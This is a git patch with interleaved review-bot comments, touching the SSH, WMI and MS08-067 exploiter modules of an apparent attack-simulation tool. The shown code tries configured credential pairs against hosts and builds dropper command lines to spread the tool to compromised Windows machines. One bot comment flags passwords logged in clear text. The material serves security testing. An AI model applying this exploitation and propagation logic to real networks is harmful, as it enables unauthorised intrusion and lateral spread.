From 40b03793c9f5b1dc45fc020192698f0f4580eea3 Mon Sep 17 00:00:00 2001
From: Itay Mizeretz
Date: Mon, 4 Sep 2017 16:44:40 +0300
Subject: [PATCH 1/2] Fix user_password_pairs indentation bug in
---
 chaos_monkey/exploit/sshexec.py | 2 +-
 chaos_monkey/exploit/wmiexec.py | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/chaos_monkey/exploit/sshexec.py b/chaos_monkey/exploit/sshexec.py
index c9ecebaee..0717f5f96 100644
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@@ -44,7 +44,7 @@ class SSHExploiter(HostExploiter):
 LOG.info("SSH port is closed on %r, skipping", host)
 return False
- user_password_pairs = self._config.get_exploit_user_password_pairs()
+ user_password_pairs = self._config.get_exploit_user_password_pairs()
 exploited = False
 for user, curpass in user_password_pairs:
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py
index 298ec5436..ab034e416 100644
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@@ -29,7 +29,7 @@ class WmiExploiter(HostExploiter):
 LOG.info("Can't find suitable monkey executable for host %r", host)
 return False
- user_password_pairs = self._config.get_exploit_user_password_pairs()
+ user_password_pairs = self._config.get_exploit_user_password_pairs()
 for user, password in user_password_pairs:
 LOG.debug("Attempting to connect %r using WMI with password '%s'",
From b420f74a55991e3b1ec61eb7e1060ddde98deb84 Mon Sep 17 00:00:00 2001
From: Itay Mizeretz
Date: Mon, 4 Sep 2017 16:51:22 +0300
Subject: [PATCH 2/2] Fix dropper bug on wmiexec and win_ms08_067
---
 chaos_monkey/exploit/win_ms08_067.py | 8 ++++----
 chaos_monkey/exploit/wmiexec.py | 8 ++++----
 2 files changed, 8 insertions(+), 8 deletions(-)
diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py
index a372070a8..ac9f878c7 100644
--- a/chaos_monkey/exploit/win_ms08_067.py
+++ b/chaos_monkey/exploit/win_ms08_067.py
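Review bot: The context line that closes the wmiexec.py hunk of patch 1/2, `LOG.debug("Attempting to connect %r using WMI with password '%s'",`, formats the candidate password into the debug log in clear text. The call's arguments continue outside the hunk, so this is inferred from the format string alone. Because `user_password_pairs` comes from `get_exploit_user_password_pairs()` in the configuration, every configured credential that is tried becomes readable to anyone who can read the log. Logging only the account would keep the trace useful without storing the secret, for example `LOG.debug("Attempting to connect %r using WMI as user %r", host, user)`.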
@@ -249,11 +249,11 @@ class Ms08_067_Exploiter(HostExploiter):
 # execute the remote dropper in case the path isn't final
 if remote_full_path.lower() != self._config.dropper_target_path.lower():
- cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
 else:
- cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
-
- cmdline += build_monkey_commandline(host, depth - 1)
+ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1)
 try:
 sock.send("start %s\r\n" % (cmdline, ))
diff --git a/chaos_monkey/exploit/wmiexec.py b/chaos_monkey/exploit/wmiexec.py
index ab034e416..312a497da 100644
--- a/chaos_monkey/exploit/wmiexec.py
+++ b/chaos_monkey/exploit/wmiexec.py
@@ -84,11 +84,11 @@ class WmiExploiter(HostExploiter):
 return False
 # execute the remote dropper in case the path isn't final
 elif remote_full_path.lower() != self._config.dropper_target_path.lower():
- cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path}
+ cmdline = DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)
 else:
- cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path}
-
- cmdline += build_monkey_commandline(host, depth - 1)
+ cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} + \
+ build_monkey_commandline(host, depth - 1)
 # execute the remote monkey
 result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
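Review bot: Nothing visible in the win_ms08_067.py hunk quotes the configured path that the dropper branch now appends with `build_monkey_commandline(host, depth - 1, self._config.dropper_target_path)`, and the resulting string is sent unmodified through `sock.send("start %s\r\n" % (cmdline, ))`. `build_monkey_commandline` and the `DROPPER_CMDLINE_WINDOWS` template are defined outside this diff, so quoting may already happen there; if it does not, a target path containing a space would be split into several arguments on the remote side. Stating the expectation next to the call would help, for example `# dropper_target_path tells the dropper its final location; build_monkey_commandline is expected to quote it`. The enclosing method starts and ends outside the hunk.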
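Review bot: The four lines added under this `elif`/`else` in wmiexec.py are the same as the ones added in win_ms08_067.py by this patch, so the dropper fix had to be applied twice and the two exploiters can diverge again. Moving the choice between `DROPPER_CMDLINE_WINDOWS` and `MONKEY_CMDLINE_WINDOWS` into one shared helper, sketched below under a proposed name, would leave a single place to change, and parentheses would replace the backslash continuations. Where such a helper should live is not visible from this diff. The enclosing method starts before the hunk, and its last statement, the `Create(cmdline,` call, continues past it.

```python
def windows_launch_cmdline(config, host, depth, remote_full_path):
    """Proposed shared helper: command line that starts the monkey or its dropper."""
    if remote_full_path.lower() != config.dropper_target_path.lower():
        # path isn't final: run the dropper and pass it the final location
        return (DROPPER_CMDLINE_WINDOWS % {'dropper_path': remote_full_path} +
                build_monkey_commandline(host, depth - 1, config.dropper_target_path))
    return (MONKEY_CMDLINE_WINDOWS % {'monkey_path': remote_full_path} +
            build_monkey_commandline(host, depth - 1))

# … unchanged: the branch that returns False …
cmdline = windows_launch_cmdline(self._config, host, depth, remote_full_path)
```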